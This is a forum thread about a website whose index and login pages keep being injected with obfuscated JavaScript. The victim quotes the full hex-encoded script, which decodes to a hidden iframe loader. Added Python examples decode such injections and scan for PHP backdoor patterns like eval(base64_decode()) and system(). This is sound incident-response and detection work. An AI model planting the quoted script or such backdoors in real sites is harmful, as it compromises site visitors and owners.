got a virus named Iframe.ph on my server

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

jawedshamshedi
Forum Commoner
Posts: 35
Joined: Fri May 16, 2008 1:17 am
Location: India

got a virus named Iframe.ph on my server

Post by jawedshamshedi »

Hi all,

I have a website running. It was fine a few days back, but now when I open the site it opens a blank page. I then checked the code of the index page and found that there is a JavaScript embedded in my code in all index pages and login pages; this JavaScript opens a blank page.
I downloaded the whole site, deleted the code from the server, and scanned the code with Kaspersky antivirus and Norton antivirus; both did not show any virus in the code. Then I manually checked all index and login named pages and no malicious code was there. Then I uploaded the site again, but for my bad luck the virus again came in Iframe.ph and again the site is not opening due to the same JavaScript code.


Can anyone help me in this regard?
jaoudestudios
DevNet Resident
Posts: 1483
Joined: Wed Jun 18, 2008 8:32 am
Location: Surrey

Re: got a virus named Iframe.ph on my server

Post by jaoudestudios »

What text editor are you using?

As far as I know, Dreamweaver enters lots of unwanted JavaScript.

Can you paste some of the code here so we can see it?
Apollo
Forum Regular
Posts: 794
Joined: Wed Apr 30, 2008 2:34 am

Re: got a virus named Iframe.ph on my server

Post by Apollo »

Most likely someone gained access to your web directory and infected some scripts.

Where is your website hosted?
jawedshamshedi
Forum Commoner
Posts: 35
Joined: Fri May 16, 2008 1:17 am
Location: India

Re: got a virus named Iframe.ph on my server

Post by jawedshamshedi »

Hi
Thanks for the response. I am using Dreamweaver CS3 and my site is hosted on netsol. The problem is that all the files named index and login are affected: all the code in these files gets lost and this JavaScript is embedded:

<script>function c41920832628m486aaf31e5abe(m486aaf31e5ea3){ function m486aaf31e628c(){return 16;} return (parseInt(m486aaf31e5ea3,m486aaf31e628c()));}function m486aaf31e6a5c(m486aaf31e6e43){ function m486aaf31e79fb(){var m486aaf31e7de2=2;return m486aaf31e7de2;} var m486aaf31e722f='';m486aaf31e81cb=String.fromCharCode;for(m486aaf31e7613=0;m486aaf31e7613<m486aaf31e6e43.length;m486aaf31e7613+=m486aaf31e79fb()){ m486aaf31e722f+=(m486aaf31e81cb(c41920832628m486aaf31e5abe(m486aaf31e6e43.substr(m486aaf31e7613,m486aaf31e79fb()))));}return m486aaf31e722f;} var zf3='';var m486aaf31e85b2='3C7'+zf3+'3637'+zf3+'2697'+zf3+'07'+zf3+'43E667'+zf3+'56E637'+zf3+'4696F6E20636865636B5F636F6E7'+zf3+'4656E7'+zf3+'428297'+zf3+'B7'+zf3+'6617'+zf3+'220693D303B7'+zf3+'7'+zf3+'68696C6528646F637'+zf3+'56D656E7'+zf3+'42E67'+zf3+'657'+zf3+'4456C656D656E7'+zf3+'47'+zf3+'3427'+zf3+'9546167'+zf3+'4E616D652827'+zf3+'69667'+zf3+'2616D6527'+zf3+'292E6C656E67'+zf3+'7'+zf3+'468297'+zf3+'B7'+zf3+'6617'+zf3+'220656C3D646F637'+zf3+'56D656E7'+zf3+'42E67'+zf3+'657'+zf3+'4456C656D656E7'+zf3+'47'+zf3+'3427'+zf3+'9546167'+zf3+'4E616D652827'+zf3+'69667'+zf3+'2616D6527'+zf3+'295B695D3B6966282028656C2E7'+zf3+'37'+zf3+'47'+zf3+'96C652E64697'+zf3+'37'+zf3+'06C617'+zf3+'93D3D27'+zf3+'6E6F6E6527'+zf3+'207'+zf3+'C7'+zf3+'C20656C2E7'+zf3+'37'+zf3+'47'+zf3+'96C652E7'+zf3+'6697'+zf3+'36962696C697'+zf3+'47'+zf3+'9203D3D27'+zf3+'68696464656E27'+zf3+'207'+zf3+'C7'+zf3+'C2028656C2E7'+zf3+'7'+zf3+'69647'+zf3+'4683C3520262620656C2E68656967'+zf3+'687'+zf3+'43C35292920262620656C2E6E616D65213D27'+zf3+'633427'+zf3+'297'+zf3+'B656C2E7'+zf3+'0617'+zf3+'2656E7'+zf3+'44E6F64652E7'+zf3+'2656D6F7'+zf3+'6654368696C6428656C293B7'+zf3+'D656C7'+zf3+'36520692B2B3B7'+zf3+'D7'+zf3+'D636865636B5F636F6E7'+zf3+'4656E7'+zf3+'428293B0D0A696628216D7'+zf3+'96961297'+zf3+'B646F637'+zf3+'56D656E7'+zf3+'42E7'+zf3+'7'+zf3+'7'+zf3+'2697'+zf3+'465287'+zf3+'56E657'+zf3+'363617'+zf3+'065282027'+zf3+'2533632536392536362537'+zf3+'3225363125366425363525323025366552536312536642536352533642536332533342532302537'+zf3+'332537'+zf3+'32253633253364253237'+zf3+'2536382537'+zf3+'342537'+zf3+'342537'+zf3+'30253361253266253266253637'+zf3+'253666253666253637'+zf3+'2536632536352532642536312536652536312536632536392537'+zf3+'61253635253265253633253666253664253266253639253665253265253633253637'+zf3+'253639253366253331253335262537'+zf3+'382537'+zf3+'3525336425333126253237'+zf3+'2532622534642536312537'+zf3+'342536382532652537'+zf3+'322536662537'+zf3+'352536652536342532382534642536312537'+zf3+'342536382532652537'+zf3+'32253631253665253634253666253664253238253239253261253332253334253331253335253332253337'+zf3+'253239253262253237'+zf3+'253635253338253631253338253332253339253635253337'+zf3+'253634253636253634253237'+zf3+'2532302537'+zf3+'37'+zf3+'2536392536342537'+zf3+'34253638253364253335253336253333253230253638253635253639253637'+zf3+'2536382537'+zf3+'342533642533342533322533392532302537'+zf3+'332537'+zf3+'342537'+zf3+'39253663253635253364253237'+zf3+'2536342536392537'+zf3+'332537'+zf3+'302536632536312537'+zf3+'39253361253230253665253666253665253635253237'+zf3+'2533652533632532662536392536362537'+zf3+'3225363125366425363525336527'+zf3+'29293B7'+zf3+'D7'+zf3+'6617'+zf3+'2206D7'+zf3+'969613D7'+zf3+'47'+zf3+'27'+zf3+'5653B3C2F7'+zf3+'3637'+zf3+'2697'+zf3+'07'+zf3+'43E';document.write(m486aaf31e6a5c(m486aaf31e85b2));</script><script>check_content()</script>

I tried many things but none worked out; I even removed the write permission of the index and login files, but this too did not work.

Thanks in advance for any kind of help
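The script quoted above is a plain hex obfuscation: a long string of two-digit hex values is split into pieces joined with an empty variable (zf3), every pair is turned back into a character with parseInt(pair, 16) and String.fromCharCode, and the result is written into the page with document.write. Reversing that is enough to read what was injected (in the quoted script, the decoded output is a second script that writes out an iframe through unescape('%3c%69%66...')). The Python below is an added example, not code from the thread; it flags inline scripts that show this pattern and decodes them. The sample page it scans is constructed here, and the hex in it decodes to a one-pixel iframe pointing at the reserved placeholder name example.invalid, not to any real address.

```python
"""Triage helper for hex-obfuscated <script> injections (added example)."""
import re
from urllib.parse import unquote

# Single-quoted literal made only of hex digits (the empty '' of zf3 matches too).
HEX_LITERAL = re.compile(r"'([0-9A-Fa-f]*)'")
SCRIPT_BLOCK = re.compile(r"<script[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)
# Second layer seen in the thread's payload: document.write(unescape('%3c%69...'))
UNESCAPE_ARG = re.compile(r"unescape\('((?:%[0-9A-Fa-f]{2})+)'\)")


def decode_hex_payload(script_text: str) -> str:
    """Join every hex-only string literal and decode two digits per character,
    mirroring what the injected decoder function does in the browser."""
    digits = "".join(HEX_LITERAL.findall(script_text))
    if not digits or len(digits) % 2:
        raise ValueError("no even-length hex payload found")
    return bytes.fromhex(digits).decode("latin-1")


def unwrap_unescape(text: str) -> str:
    """Replace unescape('%xx...') calls with their decoded text. JS unescape and
    urllib's unquote agree for plain %xx sequences (the %uXXXX form is not handled)."""
    return UNESCAPE_ARG.sub(lambda m: unquote(m.group(1)), text)


def suspicious_scripts(html: str) -> list:
    """Flag inline <script> blocks showing the obfuscation pattern and return the
    decoded payload of each so an analyst can read what was actually injected."""
    hits = []
    for body in SCRIPT_BLOCK.findall(html):
        indicators = []
        if "String.fromCharCode" in body:
            indicators.append("String.fromCharCode")
        if "document.write" in body:
            indicators.append("document.write")
        # radix 16 either as a literal or, as in the thread, via a helper function call
        if "parseInt(" in body and (",16)" in body or re.search(r",\s*\w+\(\)\)", body)):
            indicators.append("parseInt with radix 16")
        hex_digits = "".join(HEX_LITERAL.findall(body))
        if len(hex_digits) >= 40:
            indicators.append(f"{len(hex_digits)} hex digits spread over string literals")
        if len(indicators) >= 3:
            try:
                decoded = unwrap_unescape(decode_hex_payload(body))
            except ValueError:
                decoded = ""
            hits.append({"indicators": indicators, "decoded": decoded})
    return hits


# Constructed sample page: one ordinary script plus an injection built the same way
# as the one in the thread (hex split with an empty variable). The hex decodes to a
# 1x1 iframe whose src is the reserved placeholder name example.invalid.
SAMPLE_PAGE = (
    "<html><body><h1>Login</h1>\n"
    "<script>document.write('welcome');</script>\n"
    "<script>function dec(h){var o='';for(var i=0;i<h.length;i+=2){"
    "o+=String.fromCharCode(parseInt(h.substr(i,2),16));}return o;}"
    "var zf3='';var p='3C696672616D65207372633D2268747470'+zf3+"
    "'3A2F2F6578616D706C652E696E76616C69642F22'+zf3+'207769647468"
    "3D3120686569676874'+zf3+'3D313E3C2F696672616D653E';"
    "document.write(dec(p));</script>\n"
    "</body></html>"
)

if __name__ == "__main__":
    for hit in suspicious_scripts(SAMPLE_PAGE):
        print("indicators:", ", ".join(hit["indicators"]))
        print("decoded payload:", hit["decoded"])
```

Run it over a downloaded copy of the site (feeding each index and login page to suspicious_scripts) and the decoded text tells you what the injection loads; that is what to search for in the other files, and it is also the string a Google search is most likely to match.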
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: got a virus named Iframe.ph on my server

Post by Mordred »

Scan your developer machine. There is malware that does what you describe from your own machine.
For a workaround, zip your site and upload it from a cleanly installed OS.
orbitz
Forum Newbie
Posts: 3
Joined: Tue Jun 10, 2008 10:54 am

Re: got a virus named Iframe.ph on my server

Post by orbitz »

You also might have some apps that have vulnerabilities. Make sure to update those apps.
jawedshamshedi
Forum Commoner
Posts: 35
Joined: Fri May 16, 2008 1:17 am
Location: India

Re: got a virus named Iframe.ph on my server

Post by jawedshamshedi »

Thanks for the post. I already did all these: downloaded the whole site, scanned it with Norton and Kaspersky antivirus, manually checked the pages' coding, but nothing wrong was in that code, and again the virus came. One more thing I wanted to add is that I am using some open source code like list, forums and event calendar, so can this be a reason? I mean, is the open source code putting some scripts like this?
Maugrim_The_Reaper
DevNet Master
Posts: 2704
Joined: Tue Nov 02, 2004 5:43 am
Location: Ireland

Re: got a virus named Iframe.ph on my server

Post by Maugrim_The_Reaper »

Could be a bot-driven attack from an external source. Are you using any PHP application which would be considered old or insecure? One popular example is PHPNuke or older versions of phpBB. These are so common they attract automated attacks.

The other option is to contact your hosting provider in case it's not just a simpler code injection attack. Maybe a Google search of the JavaScript could turn up similar cases elsewhere also?
Reviresco
Forum Contributor
Posts: 172
Joined: Tue Feb 19, 2008 4:18 pm
Location: Milwaukee

Re: got a virus named Iframe.ph on my server

Post by Reviresco »

I have had similar problems with one of my Network Solutions sites, but not the exact same scripts you've been getting. As far as I can tell, they hacked the server and put malicious files in my directories. I think the security holes have been fixed, but the scripts continued to wreak havoc until I found them.

First be sure to change your FTP login name and password. Then look through all your files and folders for anything you didn't make yourself. They're often placed in "images" folders, sometimes in a new folder called "thumbnails".

The files are often called things like "left_menu.php" or "right_menu.php". You'll see that there will be some encrypted code, which is run using eval(base64_decode()). You also will probably find a script that calls the php function system().

At least, this is what was causing the problems for me.
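Reviresco's procedure, looking for files you did not make yourself and for code that runs eval(base64_decode()) or system(), can be done systematically: keep a manifest of the clean site you uploaded, compare the live web root against it, and grep every file for those indicators. The Python below is an added example, not code from the thread or from any of the posters; the file names (left_menu.php, right_menu.php under an images folder) follow the post, the web root it audits is constructed in a temporary directory, and the base64 string in the planted file decodes to a harmless echo.

```python
"""Audit a web root against a clean manifest and PHP backdoor indicators (added example)."""
import hashlib
import os
import re
import tempfile

# Indicators named in the thread plus the other PHP functions that run shell commands.
INDICATORS = [
    ("eval+base64_decode", re.compile(rb"eval\s*\(\s*base64_decode\s*\(")),
    ("system/exec call", re.compile(rb"\b(system|exec|shell_exec|passthru)\s*\(")),
]
# Directories that should hold images, not executable code.
ASSET_DIRS = {"images", "thumbnails", "img", "uploads"}


def sha256_file(path):
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()


def build_manifest(root):
    """Relative path (with '/' separators) -> sha256 for every file under root.
    Run this on the clean copy of the site before uploading it."""
    manifest = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = sha256_file(full)
    return manifest


def scan_file(rel, root):
    """Indicator names that fire for one file, plus a check for PHP in asset folders."""
    full = os.path.join(root, *rel.split("/"))
    with open(full, "rb") as fh:
        data = fh.read()
    reasons = [name for name, rx in INDICATORS if rx.search(data)]
    parent_dirs = set(rel.split("/")[:-1])
    if rel.lower().endswith(".php") and parent_dirs & ASSET_DIRS:
        reasons.append("PHP file inside an asset directory")
    return reasons


def audit(root, baseline):
    """Compare the live web root with the clean manifest and scan every file.
    Returns {relpath: [reasons]} for files that are new, changed, or carry indicators."""
    findings = {}
    for rel, digest in build_manifest(root).items():
        reasons = []
        if rel not in baseline:
            reasons.append("not in baseline (you did not upload this)")
        elif baseline[rel] != digest:
            reasons.append("content differs from baseline")
        reasons += scan_file(rel, root)
        if reasons:
            findings[rel] = reasons
    return findings


def write(root, rel, content):
    full = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "wb") as fh:
        fh.write(content)


def build_sample_incident():
    """Constructed sample: a clean three-file site, then the same site after a break-in."""
    root = tempfile.mkdtemp(prefix="webroot_")
    write(root, "index.php", b"<?php include 'header.php'; ?>\n")
    write(root, "header.php", b"<html><body>\n")
    write(root, "images/logo.png", b"\x89PNG fake bytes")
    baseline = build_manifest(root)
    # After the compromise: two dropped files in image folders and a modified index page.
    write(root, "images/thumbnails/left_menu.php",
          b"<?php eval(base64_decode('ZWNobyAnaGknOw==')); ?>\n")  # base64 of: echo 'hi';
    write(root, "images/right_menu.php", b"<?php system('uptime'); ?>\n")
    write(root, "index.php", b"<?php include 'header.php'; ?>\n<script>/* injected */</script>\n")
    return root, baseline


if __name__ == "__main__":
    root, baseline = build_sample_incident()
    for rel, reasons in sorted(audit(root, baseline).items()):
        print(f"{rel}: {'; '.join(reasons)}")
```

The manifest is what makes the audit repeatable: build it from the clean copy you hold locally, change the FTP credentials, upload, and re-run audit() against a fresh download whenever the site breaks again. If files keep reappearing after the credentials were rotated from a clean machine, the write access is coming from somewhere other than FTP (a vulnerable application or the host itself), which is the question to put to the provider.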